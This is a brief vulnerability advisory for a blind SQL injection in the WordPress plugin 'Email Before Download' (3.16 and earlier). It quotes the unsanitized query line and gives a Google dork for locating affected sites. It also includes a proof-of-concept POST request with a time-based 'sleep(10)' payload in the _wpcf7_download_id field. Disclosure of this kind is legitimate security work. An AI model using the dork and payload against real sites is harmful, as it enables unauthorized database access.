# Wordpress Plugin: Email Before Download <=3.16 Remote Blind SQL Inyection
# Dork: allinurl: plugins/email-before-download
# Download: https://wordpress.org/extend/plugins/email-before-download/
# Date: 13/04/12
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
The variable $download_id is not properly sanitized with $wpdb->escape() before using it.
On line 120 (File: /email-before-download/email-before-download.php) we can see that:
=====================================================================================
120: $ebd_item = $wpdb->get_row( "SELECT * FROM $table_item WHERE download_id = '$download_id' " );
In the HTML generated, we can see that $download_id takes the $_POST value variable "_wpcf7_download_id" :
201: $hf .= '<input type="hidden" name="_wpcf7_download_id" value="' . $download_id. '" /></form>';
PoC:
====
POST http://website.com/?tag=some-post-with-contact-form
Data:
=====
_wpcf7=135&_wpcf7_download_id=6 [SQL HERE]&_wpcf7_unit_tag=wpcf7-f105-p1635-o1&_wpcf7_version=3.0.1&your-email=email@sample.com&your-enterprise=1&your-name=test
Example:
========
_wpcf7=135&_wpcf7_download_id=6 and sleep(10)&_wpcf7_unit_tag=wpcf7-f105-p1635-o1&_wpcf7_version=3.0.1&your-email=email@sample.com&your-enterprise=1&your-name=test
(POST variables names may vary)
